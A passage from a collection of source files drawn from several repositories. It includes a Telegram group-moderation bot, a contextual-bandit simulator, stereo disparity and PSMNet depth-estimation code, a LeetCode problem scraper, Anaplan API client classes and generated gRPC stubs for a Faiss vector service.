bio = self.db.get_link(self.chat_id,self.tag_user_id)
if bio[4] == None:
self.msg.reply_text("Bio has not been set for this user in this group !")
return
self.msg.reply_text(str(bio[4]))
except:
self.msg.reply_text("Bio has not been set for this user !")
def edit_router(update,context):
threading.Thread(target=edit_cls(update,context).router, args=(), daemon=True).start()
```
#### File: modules/core/filter.py
```python
import modules.core.database as database
#import modules.core.extract as extract
import modules.core.extract as extract
import modules.core.unparse as unparse
import time
import threading
import json
class filter_switch():
def __init__(self,update,context) -> None:
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.chat_id = self.chat["id"]
self.msg_string = self.msg.text
def lock(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
extract.admin_sync(self.update,self.context,db=self.db)
self.db.add_settings(self.chat_id,lock=1)
self.msg.reply_text("Chat Locked !")
def unlock(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
#extract.admin_sync(self.update,self.context,self.db)
unparse.unparse_cls(self.update,self.context).sync()
self.db.add_settings(self.chat_id,lock=0)
self.msg.reply_text("Chat Unlocked !")
def filter_remove(self,word,tell=0):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.db.remove_filter(self.chat_id,word)
if tell==1:
if word == '*':
self.msg.reply_text("Cleared filter !")
else:
self.msg.reply_text(word + " removed from filter !")
def filter_add(self,res):
word=None
response=None
delete=0
type=0
try:
ress = res.split(None, 2)
if ress[1] == "reply":
type=1
elif ress[1] == "replydel":
type=1
delete=1
elif ress[1] == "warn":
type=2
elif ress[1] == "warndel":
type=2
delete=1
else:
return
word=ress[0]
response=ress[2]
except:
if type==2:
self.msg.reply_text("Give a response message for warn..")
return
word = res
delete=1 #type=0
chat_id = self.chat_id
filter_list = self.db.get_filter(chat_id)
for i in filter_list:
if word == i[2]:
#database.remove_filter(chat_id,word)
self.filter_remove(word)
break
self.db.add_filter(chat_id=chat_id,word=word,type=type,response=response,delete=delete)
self.msg.reply_text(word + " added to filter !")
def filter_stat(self,res):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
if res == "on":
self.db.add_settings(self.chat_id,filter=1)
self.msg.reply_text("Chat filter active !")
elif res == "off":
self.db.add_settings(self.chat_id,filter=0)
self.msg.reply_text("Chat filter deactivated !")
elif res == "list":
fi_li = self.db.get_filter(self.chat_id)
self.msg.reply_text(fi_li)
#elif res == "stat":
else:
x = len(self.db.get_filter(self.chat_id))
z = self.db.get_settings(self.chat_id)
if z[5] != 0:
z="active"
else:
z="Off"
self.msg.reply_text("Filter currently " + z + " with " + str(x) + " active filters in this chat..")
def router(self):
res = self.msg_string.split(None,1)
if res[0] == "/lock":
self.lock()
elif res[0] == "/unlock":
self.unlock()
elif res[0] == "/filter":
try:
self.filter_stat(res[1])
except:
self.filter_stat("stat")
elif res[0] == "/filteradd":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
try:
self.filter_add(res[1])
except:
ex = "Please use this format : \n'/filteradd <word> <filter-type> <reason/reply-text>'\n\n<word> is the text that the bot has to react to\n<filter-type> is the type of filter, it can be any from ( 'warn', 'reply, 'delete', 'warndel', 'replydel' )\n <reason/reply-text> : is the text bot responds with during reply & warn\n\nEx : '/filteradd beep warndel for using profane words'"
self.msg.reply_text(ex)
elif res[0] == "/filterdel":
self.filter_remove(res[1],1)
def filter_router(update,context):
threading.Thread(target=filter_switch(update,context).router, args=(), daemon=True).start()
```
|
{
"source": "jeswan/delayed_feedback_contextual_bandits",
"score": 3
}
|
#### File: src/models/uniform_model.py
```python
import numpy as np
import matplotlib.pyplot as plt
from reward_generators.simple_rewards import SimpleRewardsGenerator
def evaluate(model, n_steps=1000, delta=10, reward_gen=SimpleRewardsGenerator()):
"""Evaulate the regrets and rewards of a given model based on a given reward
generator
Args:
model (TYPE): Description
n_steps (int, optional): Description
delta (int, optional): Number of steps for feedback delay
reward_gen (TYPE, optional): Description
Returns:
regrets (list): List of regrets for each round. Regret is the maximum
reward minus the selected action's reward for the round
rewards (list): List of rewards for actions taken
"""
regrets = []
rewards = []
last_rewards = []
last_changes = []
for step in range(1, n_steps + 1):
reward_vector, item_changed = reward_gen.get_rewards()
selected_action = model.get_action()
regret = (
np.max(reward_gen.reward_probs) - reward_gen.reward_probs[selected_action]
)
regrets.append(regret)
rewards.append(reward_vector[selected_action])
last_rewards.append(reward_vector[selected_action])
last_changes.append(item_changed)
# Feedback if delta steps have passed
if step % delta == 0:
model.update(last_rewards, last_changes)
last_rewards = []
last_changes = []
return regrets, rewards
class UniformModel:
"""Model that uniformly chooses a random action
"""
def __init__(self, n_items=10):
self.n_items = n_items
def get_action(self):
"""Returns a random item
Returns:
int: Index of the uniformly sampled item
"""
return np.random.choice(self.n_items)
def update(self, x, y):
"""Summary
Args:
x (TYPE): Description
y (TYPE): Description
"""
pass
if __name__ == "__main__":
for _ in range(10):
gen = SimpleRewardsGenerator(change_prob=0.5)
print("Reward probabilities before: ", gen.reward_probs)
rewards, change = gen.get_rewards()
print("Rewards: ", rewards)
print("Item changed: ", change)
print("Reward probabilities after: ", gen.reward_probs, "\n")
regrets, rewards = evaluate(UniformModel())
plt.plot(range(len(regrets)), np.cumsum(regrets))
plt.title("Regret")
plt.show()
plt.plot(range(len(rewards)), np.cumsum(rewards))
plt.title("Reward")
plt.show()
```
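The evaluation loop above only relies on two methods of the model: `get_action()` returning an item index and `update(rewards, changes)` receiving the delayed feedback batch. Other policies can therefore be dropped in; below is a minimal epsilon-greedy sketch (hypothetical, not part of this repository) that tracks its own pending actions between feedback rounds.
```python
import numpy as np

class EpsilonGreedyModel:
    """Illustrative model matching the evaluate() interface (an assumed example, not from the repo)."""

    def __init__(self, n_items=10, epsilon=0.1):
        self.n_items = n_items
        self.epsilon = epsilon
        self.counts = np.zeros(n_items)
        self.values = np.zeros(n_items)
        self._pending = []  # actions taken since the last feedback batch

    def get_action(self):
        # Explore with probability epsilon, otherwise exploit the current estimate
        if np.random.rand() < self.epsilon:
            action = int(np.random.choice(self.n_items))
        else:
            action = int(np.argmax(self.values))
        self._pending.append(action)
        return action

    def update(self, rewards, changes):
        # Delayed feedback: one reward per action taken since the last update
        for action, reward in zip(self._pending, rewards):
            self.counts[action] += 1
            self.values[action] += (reward - self.values[action]) / self.counts[action]
        self._pending = []

# regrets, rewards = evaluate(EpsilonGreedyModel(), delta=10)
```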
#### File: src/reward_generators/simple_rewards.py
```python
import numpy as np
class SimpleRewardsGenerator:
"""Generates rewards according to the procedure in Table 1 of "An Empirical Evaluation of
Thompson Sampling" by <NAME> Li.
Attributes:
change_prob (float): The probability one of the items is retired and replaced by a new one
n_items (int): number of items
reward_dist (callable): Distribution used to draw the true reward probability of an item
reward_probs (ndarray or scalar): The true reward probability of each item
"""
def __init__(
self,
n_items=10,
change_prob=1e-3,
reward_dist=lambda x: np.random.default_rng().beta(4.0, 4.0, size=x),
):
self.n_items = n_items
self.change_prob = change_prob
self.reward_dist = reward_dist
self.reward_probs = self.reward_dist(self.n_items)
def get_rewards(self):
"""Get reward array for the simulator
Returns:
ndarray: Reward array with reward for each item
item_changed: item that was replaced
"""
item_changed = None
if np.random.rand() < self.change_prob:
item_to_change = np.random.choice(self.n_items)
self.reward_probs[item_to_change] = self.reward_dist(1)[0]
item_changed = item_to_change
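# Bernoulli draw per item: reward is 1 with probability reward_probs[i], else 0.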
rewards = (np.random.rand(self.n_items) < self.reward_probs) * 1
return rewards, item_changed
```
|
{
"source": "jeswan/endodepth",
"score": 2
}
|
#### File: jeswan/endodepth/generate_disparity.py
```python
import os
import cv2
import argparse
import numpy as np
import itertools
import shutil
from pathlib import Path
from os import listdir
from os.path import isfile, join
import matplotlib.pyplot as plt
import PIL.Image as Image
from concurrent.futures import ThreadPoolExecutor
# GIF
import glob
from PIL import Image
def normalize(image):
return cv2.normalize(src=image, dst=image, beta=0, alpha=255, norm_type=cv2.NORM_MINMAX)
# TODO: return confidence map
def process_frame_BM_postproc(left, right, name, output_dir, do_blur=True, do_downsample=True, do_plot=False, **kwargs):
numDisparities = kwargs.get('disparity')
kernel_size = 3
left = cv2.GaussianBlur(left, (kernel_size, kernel_size), 1.5)
right = cv2.GaussianBlur(right, (kernel_size, kernel_size), 1.5)
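# Block-match in both directions, then fuse the two disparity maps with
# OpenCV's weighted least squares (WLS) filter for confidence-aware,
# edge-preserving smoothing of the left-view disparity.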
left_matcher = cv2.StereoBM_create(numDisparities=kwargs.get(
'disparity'), blockSize=kwargs.get('blockSize'))
wls_filter = cv2.ximgproc.createDisparityWLSFilter(left_matcher)
right_matcher = cv2.ximgproc.createRightMatcher(left_matcher)
wls_filter.setLambda(kwargs.get('lambdas'))
wls_filter.setSigmaColor(kwargs.get('sigmaColors'))
disparity_left = np.int16(left_matcher.compute(left, right))
disparity_right = np.int16(right_matcher.compute(right, left))
wls_image = wls_filter.filter(disparity_map_left=disparity_left,
left_view=left, right_view=right, disparity_map_right=disparity_right)
wls_image = normalize(wls_image)
wls_image = np.uint8(wls_image)
#crop - https://stackoverflow.com/questions/13538748/crop-black-edges-with-opencv
_,thresh = cv2.threshold(wls_image,1,255,cv2.THRESH_BINARY)
contours, hierarchy = cv2.findContours(thresh,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2:]
cnt = contours[0]
x,y,w,h = cv2.boundingRect(cnt)
crop = wls_image[y:y+h,x:x+w]
cv2.imwrite(os.path.join(output_dir, name + ".png"), crop)
def product_dict(**kwargs):
keys = kwargs.keys()
vals = kwargs.values()
for instance in itertools.product(*vals):
yield dict(zip(keys, instance))
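# e.g. product_dict(disparity=[64, 128], blockSize=[15]) yields
# {'disparity': 64, 'blockSize': 15} and {'disparity': 128, 'blockSize': 15}.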
def process_dataset(left_dir, right_dir, output_dir, algo="BM_POST", **kwargs):
left_images = [f for f in listdir(left_dir) if f.endswith('.png')]
right_images = [f for f in listdir(right_dir) if f.endswith('.png')]
assert(len(left_images) == len(right_images))
left_images.sort()
right_images.sort()
executor = ThreadPoolExecutor()
for params in product_dict(**kwargs):
for i in range(len(left_images)):
left_image_path = os.path.join(left_dir, left_images[i])
right_image_path = os.path.join(right_dir, right_images[i])
imgL = cv2.imread(left_image_path, cv2.IMREAD_GRAYSCALE)
imgR = cv2.imread(right_image_path, cv2.IMREAD_GRAYSCALE)
executor.submit(process_frame_BM_postproc, imgL, imgR, left_images[i].split('.')[0], output_dir=output_dir, **params)
# createGifs()
def createGifs(input_dir, output_dir):
# https://pillow.readthedocs.io/en/stable/handbook/image-file-formats.html#gif
fp_in = input_dir+'*.png'
fp_out = f"{glob.glob(fp_in)[0].split('.')[0]}.gif"
img, *imgs = [Image.open(f) for f in sorted(glob.glob(fp_in))]
img.save(fp=fp_out, format='GIF', append_images=imgs,
save_all=True, loop=0)
# delete imgs
for filename in os.listdir(fp_in.split('*')[0]):
if filename.endswith(".png"):
file_path = os.path.join(output_dir, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete %s. Reason: %s' % (file_path, e))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='Create disparity maps using StereoBM.')
parser.add_argument("-l", "--left_dir",
dest="left_dir", required=True, help="directory of left daVinci images", metavar="DIR")
parser.add_argument("-r", "--right_dir",
dest="right_dir", required=True, help="directory of right daVinci images", metavar="DIR")
parser.add_argument("-o", "--output_dir",
dest="output_dir", required=True, help="output directory of daVinci disparity maps", metavar="DIR")
args = parser.parse_args()
Path(args.output_dir).mkdir(parents=True, exist_ok=True)
# BM params
NUM_DISPARITIES = [64]
BLOCK_SIZES = [15]
# optional processing
do_downsample = False
do_blur = True
if do_downsample:
NUM_DISPARITIES = [int(x / 2) for x in NUM_DISPARITIES]
# postprocessing params
LAMBDAS = [8000]
SIGMA_COLORS = [0.8]
process_dataset(left_dir=args.left_dir, right_dir=args.right_dir, output_dir=args.output_dir, disparity=NUM_DISPARITIES,
blockSize=BLOCK_SIZES, lambdas=LAMBDAS, sigmaColors=SIGMA_COLORS)
```
|
{
"source": "Jeswang/leetcode-xcode",
"score": 3
}
|
#### File: Jeswang/leetcode-xcode/get-data.py
```python
import os
import re
import bs4
import requests

# Placeholder author name and date for the generated header (assumed values; not defined elsewhere).
autherName = "<NAME>"
date = "<DATE>"
def createFile(fileName, content):
with open(fileName, 'a') as file:
file.write(content)
file.close()
class BaseHandler:
def __init__(self, soup=None):
self.soup = soup
class LCProblemHandler(BaseHandler):
def run(self):
problems = self.soup.find_all('tr')
self.problem_names = []
self.problem_dates = []
self.problem_ac_rate = []
self.problem_urls = []
for i in problems:
result = i.find_all('td')
if len(result) > 0:
self.problem_names += result[1].contents[0]
self.problem_urls.append("http://oj.leetcode.com" + result[1].find('a')['href'])
self.problem_dates.append(result[2].contents[0])
self.problem_ac_rate.append(result[3].contents[0][:-1])
class QuestionHandler(BaseHandler):
def run(self):
textarea = self.soup.find("textarea", class_='cpp')
self.cpp = textarea.get_text()
question = self.soup.find(class_='question-content')
self.description = question.get_text()
def generateHeader():
r = requests.get("http://oj.leetcode.com/problems/")
soup = bs4.BeautifulSoup(r.text)
main_handler = LCProblemHandler(soup)
main_handler.run()
for i in range(len(main_handler.problem_urls)):
url = main_handler.problem_urls[i]
r = re.compile(r"""\/([\w-]*)\/$""")
fileName = r.findall(url)[0]+".h"
r = requests.get(url)
soup = bs4.BeautifulSoup(r.text)
handler = QuestionHandler(soup)
handler.run()
print("NO "+ str(i) + " Finished.")
author = """//
// %s
//
// Created by %s %s.
//
""" % (fileName, autherName, date)
comment = ("/*\nDescription:"+ handler.description+"*/").replace('\n\n', '\n')
code = handler.cpp
createFile(fileName, author + "\n" + comment + "\n\n" + code)
if __name__ == "__main__":
generateHeader()
```
|
{
"source": "jeswan/PSMNet",
"score": 2
}
|
#### File: PSMNet/models/stackhourglass.py
```python
from __future__ import print_function
import torch
import torch.nn as nn
import torch.utils.data
from torch.autograd import Variable
import torch.nn.functional as F
import math
from .submodule import *
class hourglass(nn.Module):
def __init__(self, inplanes):
super(hourglass, self).__init__()
self.conv1 = nn.Sequential(convbn_3d(inplanes, inplanes*2, kernel_size=3, stride=2, pad=1),
nn.ReLU(inplace=True))
self.conv2 = convbn_3d(inplanes*2, inplanes*2, kernel_size=3, stride=1, pad=1)
self.conv3 = nn.Sequential(convbn_3d(inplanes*2, inplanes*2, kernel_size=3, stride=2, pad=1),
nn.ReLU(inplace=True))
self.conv4 = nn.Sequential(convbn_3d(inplanes*2, inplanes*2, kernel_size=3, stride=1, pad=1),
nn.ReLU(inplace=True))
self.conv5 = nn.Sequential(nn.ConvTranspose3d(inplanes*2, inplanes*2, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),
nn.BatchNorm3d(inplanes*2)) #+conv2
self.conv6 = nn.Sequential(nn.ConvTranspose3d(inplanes*2, inplanes, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),
nn.BatchNorm3d(inplanes)) #+x
def forward(self, x ,presqu, postsqu):
out = self.conv1(x) #in:1/4 out:1/8
pre = self.conv2(out) #in:1/8 out:1/8
if postsqu is not None:
pre = F.relu(pre + postsqu, inplace=True)
else:
pre = F.relu(pre, inplace=True)
out = self.conv3(pre) #in:1/8 out:1/16
out = self.conv4(out) #in:1/16 out:1/16
if presqu is not None:
post = F.relu(self.conv5(out)+presqu, inplace=True) #in:1/16 out:1/8
else:
post = F.relu(self.conv5(out)+pre, inplace=True)
out = self.conv6(post) #in:1/8 out:1/4
return out, pre, post
class PSMNet(nn.Module):
def __init__(self, maxdisp):
super(PSMNet, self).__init__()
self.maxdisp = maxdisp
self.feature_extraction = feature_extraction()
self.dres0 = nn.Sequential(convbn_3d(64, 32, 3, 1, 1),
nn.ReLU(inplace=True),
convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True))
self.dres1 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True),
convbn_3d(32, 32, 3, 1, 1))
self.dres2 = hourglass(32)
self.dres3 = hourglass(32)
self.dres4 = hourglass(32)
self.classif1 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True),
nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1,bias=False))
self.classif2 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True),
nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1,bias=False))
self.classif3 = nn.Sequential(convbn_3d(32, 32, 3, 1, 1),
nn.ReLU(inplace=True),
nn.Conv3d(32, 1, kernel_size=3, padding=1, stride=1,bias=False))
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.Conv3d):
n = m.kernel_size[0] * m.kernel_size[1]*m.kernel_size[2] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm3d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.bias.data.zero_()
def forward(self, left, right):
refimg_fea = self.feature_extraction(left)
targetimg_fea = self.feature_extraction(right)
#matching
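# Build a 5D cost volume of shape (batch, 2*feature_channels, maxdisp/4, H/4, W/4):
# for each candidate disparity i, the reference (left) features are stacked with
# the target (right) features shifted by i columns along the width axis.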
cost = Variable(torch.FloatTensor(refimg_fea.size()[0], refimg_fea.size()[1]*2, self.maxdisp//4, refimg_fea.size()[2], refimg_fea.size()[3]).zero_()).cuda()
for i in range(self.maxdisp//4):
if i > 0 :
cost[:, :refimg_fea.size()[1], i, :,i:] = refimg_fea[:,:,:,i:]
cost[:, refimg_fea.size()[1]:, i, :,i:] = targetimg_fea[:,:,:,:-i]
else:
cost[:, :refimg_fea.size()[1], i, :,:] = refimg_fea
cost[:, refimg_fea.size()[1]:, i, :,:] = targetimg_fea
cost = cost.contiguous()
cost0 = self.dres0(cost)
cost0 = self.dres1(cost0) + cost0
out1, pre1, post1 = self.dres2(cost0, None, None)
out1 = out1+cost0
out2, pre2, post2 = self.dres3(out1, pre1, post1)
out2 = out2+cost0
out3, pre3, post3 = self.dres4(out2, pre1, post2)
out3 = out3+cost0
cost1 = self.classif1(out1)
cost2 = self.classif2(out2) + cost1
cost3 = self.classif3(out3) + cost2
if self.training:
cost1 = F.upsample(cost1, [self.maxdisp,left.size()[2],left.size()[3]], mode='trilinear')
cost2 = F.upsample(cost2, [self.maxdisp,left.size()[2],left.size()[3]], mode='trilinear')
cost1 = torch.squeeze(cost1,1)
pred1 = F.softmax(cost1,dim=1)
pred1 = disparityregression(self.maxdisp)(pred1)
cost2 = torch.squeeze(cost2,1)
pred2 = F.softmax(cost2,dim=1)
pred2 = disparityregression(self.maxdisp)(pred2)
cost3 = F.upsample(cost3, [self.maxdisp,left.size()[2],left.size()[3]], mode='trilinear')
cost3 = torch.squeeze(cost3,1)
pred3 = F.softmax(cost3,dim=1)
#For your information: This formulation 'softmax(c)' learned "similarity"
#while 'softmax(-c)' learned 'matching cost' as mentioned in the paper.
#However, 'c' or '-c' do not affect the performance because feature-based cost volume provided flexibility.
pred3 = disparityregression(self.maxdisp)(pred3)
if self.training:
return pred1, pred2, pred3
else:
return pred3
```
|
{
"source": "jeswils-ap/anaplan-api",
"score": 2
}
|
#### File: src/anaplan_api/Model.py
```python
import json
import logging
import requests
from typing import List
from requests.exceptions import HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout
from .User import User
from .ModelDetails import ModelDetails
logger = logging.getLogger(__name__)
class Model(User):
def get_models(self) -> List[ModelDetails]:
model_details_list: List[ModelDetails] = []
model_list = {}
url = ''.join([super().get_url(), super().get_id(), "/models"])
authorization = super().get_conn().get_auth().get_auth_token()
get_header = {
"Authorization": authorization,
"Content-Type": "application/json"
}
logger.info(f"Fetching models for {super().get_id()}")
try:
model_list = json.loads(requests.get(url, headers=get_header, timeout=(5, 30)).text)
except (HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout) as e:
logger.error(f"Error getting models list: {e}", exc_info=True)
raise Exception(f"Error getting model list {e}")
except ValueError as e:
logger.error(f"Error loading model list {e}", exc_info=True)
raise Exception(f"Error loading model list {e}")
if 'models' in model_list:
models = model_list['models']
logger.info("Finished fetching models.")
for item in models:
model_details_list.append(ModelDetails(item))
return model_details_list
else:
raise AttributeError("Models not found in response.")
```
#### File: src/anaplan_api/User.py
```python
import json
import logging
import requests
from requests.exceptions import HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout
from .AnaplanConnection import AnaplanConnection
from .util.AnaplanVersion import AnaplanVersion
from .UserDetails import UserDetails
logger = logging.getLogger(__name__)
class User:
_url: str = f"https://api.anaplan.com/{AnaplanVersion.major()}/{AnaplanVersion.minor()}/users/"
_conn: AnaplanConnection
_user_id: str
_user_details: UserDetails
def __init__(self, conn: AnaplanConnection, user_id: str = None):
self._conn = conn
self._user_id = user_id
def get_current_user(self):
if self._user_id is None:
url = ''.join([self._url, "me"])
authorization = self._conn.get_auth().get_auth_token()
get_header = {
"Authorization": authorization
}
logger.debug("Fetching user ID.")
try:
logger.debug("Retrieving details of current user.")
user_details = json.loads(requests.get(url, headers=get_header, timeout=(5, 30)).text)
except (HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout) as e:
logger.error(f"Error fetching user details {e}", exc_info=True)
raise Exception(f"Error fetching user details {e}")
except ValueError as e:
logger.error(f"Error loading model list {e}", exc_info=True)
raise ValueError(f"Error loading model list {e}")
if 'user' in user_details:
if 'id' in user_details['user']:
self._user_id = user_details['user']['id']
self._user_details = UserDetails(user_details['user'])
else:
raise KeyError("'id' not found in response")
else:
raise KeyError("'user' not found in response")
def get_user_details(self):
if self._user_id is not None:
url = ''.join([self._url, self._user_id])
            authorization = self._conn.get_auth().get_auth_token()
get_header = {
"Authorization": authorization
}
logger.debug("Fetching user ID.")
try:
logger.debug("Retrieving details of current user.")
user_details = json.loads(requests.get(url, headers=get_header, timeout=(5, 30)).text)
except (HTTPError, ConnectionError, SSLError, Timeout, ConnectTimeout, ReadTimeout) as e:
logger.error(f"Error fetching user details {e}", exc_info=True)
raise Exception(f"Error fetching user details {e}")
except ValueError as e:
logger.error(f"Error loading model list {e}", exc_info=True)
raise ValueError(f"Error loading model list {e}")
if 'user' in user_details:
if 'id' in user_details['user']:
self._user_id = user_details['user']['id']
self._user_details = UserDetails(user_details['user'])
else:
raise KeyError("'id' not found in response")
else:
raise KeyError("'user' not found in response")
def get_conn(self) -> AnaplanConnection:
return self._conn
def get_url(self) -> str:
return self._url
def get_id(self) -> str:
return self._user_id
def get_user(self) -> UserDetails:
return self._user_details
def get_models(self):
"""Get list of models for a user"""
def get_workspace(self):
"""Get list of workspaces for a user"""
```
|
{
"source": "jeswils-ap/anaplan_transactional_api",
"score": 3
}
|
#### File: src/anaplan_api/AuthToken.py
```python
from dataclasses import dataclass
@dataclass
class AuthToken(object):
"""
AuthToken object stores Anaplan auth header and expiry time
:param token_value: AnaplanAuthToken value
:type token_value: str
:param token_expiry: Expiry time in epoch
:type token_expiry: float
"""
token_value: str
token_expiry: float
def __init__(self, token_value: str, token_expiry: float):
"""
:param token_value: Hexadecimal API authorization string
:type token_value: str
:param token_expiry: Expiry time of auth token in epoch
:type token_expiry: float
"""
self.token_value = AuthToken._token_convert(token_value)
self.token_expiry = token_expiry
def get_auth_token(self) -> str:
"""Get auth token value
:return: Auth token value
:rtype: str
"""
return self.token_value
def set_auth_token(self, token_value: str):
"""Update auth token value
:param token_value: New token value to set
:type token_value: str
"""
self.token_value = token_value
def get_token_expiry(self) -> float:
"""Get token expiry value
:return: Token expiry time
:rtype: float
"""
return self.token_expiry
def set_token_expiry(self, token_expiry):
"""Update token expiry time
:param token_expiry: New expiry time of auth token in epoch
:type token_expiry: float
"""
self.token_expiry = token_expiry
@staticmethod
def _token_convert(token_value: str) -> str:
"""Ensures provided token value matches expected format
:param token_value: Auth token value
:type token_value: str
:return: Auth token value formatted for request headers
:rtype: str
"""
if not token_value[:7] == "Anaplan":
return ''.join(['AnaplanAuthToken ', token_value])
else:
return token_value
```
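A brief illustration of the prefix normalisation performed by `_token_convert`; the token string, expiry value, and import path below are invented for the example.
```python
# Hypothetical usage; the token value, expiry and import path are assumptions.
from anaplan_api.AuthToken import AuthToken

token = AuthToken("1a2b3c4d5e", 1653412800.0)
print(token.get_auth_token())    # 'AnaplanAuthToken 1a2b3c4d5e' (prefix added automatically)
print(token.get_token_expiry())  # 1653412800.0
```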
#### File: src/anaplan_api/Model.py
```python
import logging
from typing import List
from .AnaplanRequest import AnaplanRequest
from .User import User
from .ModelDetails import ModelDetails
logger = logging.getLogger(__name__)
class Model(User):
def get_models_url(self) -> AnaplanRequest:
"""Get list of all Anaplan model for the specified user.
:return: Object containing API request details
:rtype: AnaplanRequest
"""
url = ''.join([super().get_url(), super().get_id(), "/models"])
get_header = {
"Content-Type": "application/json"
}
return AnaplanRequest(url=url, header=get_header)
@staticmethod
def parse_models(model_list: dict) -> List[ModelDetails]:
"""Get list of all Anaplan model for the specified user.
:param model_list: JSON list of models accessible to the current user
:type model_list: dict
:raises AttributeError: No models available for specified user.
:return: Details for all models the user can access.
:rtype: List[ModelDetails]
"""
        model_details_list = []
        logger.info("Parsing models...")
if 'models' in model_list:
models = model_list['models']
logger.info("Finished parsing models.")
for item in models:
model_details_list.append(ModelDetails(item))
return model_details_list
else:
raise AttributeError("Models not found in response.")
```
#### File: anaplan_api/util/AnaplanVersion.py
```python
class AnaplanVersion:
_api_major_version: int = 2
_api_minor_version: int = 0
@staticmethod
def major():
return AnaplanVersion._api_major_version
@staticmethod
def minor():
return AnaplanVersion._api_minor_version
```
#### File: src/anaplan_api/WorkspaceDetails.py
```python
from distutils.util import strtobool
from dataclasses import dataclass
@dataclass()
class WorkspaceDetails(object):
_model_details: dict
_id: str
_name: str
_active: bool
_allowance: float
_current_size: float
def __init__(self, details: dict):
"""
:param details: JSON workspace details
"""
self._model_details = details
self._id = details['id']
self._name = details['name']
self._active = bool(strtobool(str(details['active']).lower()))
self._allowance = float(details['sizeAllowance']) / (1024 ** 2)
self._current_size = float(details['currentSize']) / (1024 ** 2)
def __str__(self) -> str:
"""
:return: Friendly workspace details
:rtype: str
"""
return f"Workspace name: {self._name}, ID: {self._id}, Model state: {self._active}, " \
f"workspace size: {self._current_size}, workspace allowance: {self._allowance}"
```
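For illustration, the class takes a raw JSON workspace entry and reports sizes in MB; every field value below is invented.
```python
# Hypothetical usage; all field values are invented for illustration.
details = {
    "id": "8a81b09d5e8c6f27",
    "name": "Demo Workspace",
    "active": "true",
    "sizeAllowance": 1073741824,  # bytes
    "currentSize": 536870912,     # bytes
}
ws = WorkspaceDetails(details)
print(ws)  # sizes are converted to MB via value / 1024**2
```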
|
{
"source": "JESWINKNINAN/AquilaDB",
"score": 2
}
|
#### File: src/proto/faiss_pb2_grpc.py
```python
import grpc
from proto import faiss_pb2 as proto_dot_faiss__pb2
class FaissServiceStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.initFaiss = channel.unary_unary(
'/faiss.FaissService/initFaiss',
request_serializer=proto_dot_faiss__pb2.initFaissRequest.SerializeToString,
response_deserializer=proto_dot_faiss__pb2.initFaissResponse.FromString,
)
self.addVectors = channel.unary_unary(
'/faiss.FaissService/addVectors',
request_serializer=proto_dot_faiss__pb2.addVecRequest.SerializeToString,
response_deserializer=proto_dot_faiss__pb2.addVecResponse.FromString,
)
self.deleteVectors = channel.unary_unary(
'/faiss.FaissService/deleteVectors',
request_serializer=proto_dot_faiss__pb2.deleteVecRequest.SerializeToString,
response_deserializer=proto_dot_faiss__pb2.deleteVecResponse.FromString,
)
self.getNearest = channel.unary_unary(
'/faiss.FaissService/getNearest',
request_serializer=proto_dot_faiss__pb2.getNearestRequest.SerializeToString,
response_deserializer=proto_dot_faiss__pb2.getNearestResponse.FromString,
)
class FaissServiceServicer(object):
# missing associated documentation comment in .proto file
pass
def initFaiss(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def addVectors(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def deleteVectors(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def getNearest(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_FaissServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'initFaiss': grpc.unary_unary_rpc_method_handler(
servicer.initFaiss,
request_deserializer=proto_dot_faiss__pb2.initFaissRequest.FromString,
response_serializer=proto_dot_faiss__pb2.initFaissResponse.SerializeToString,
),
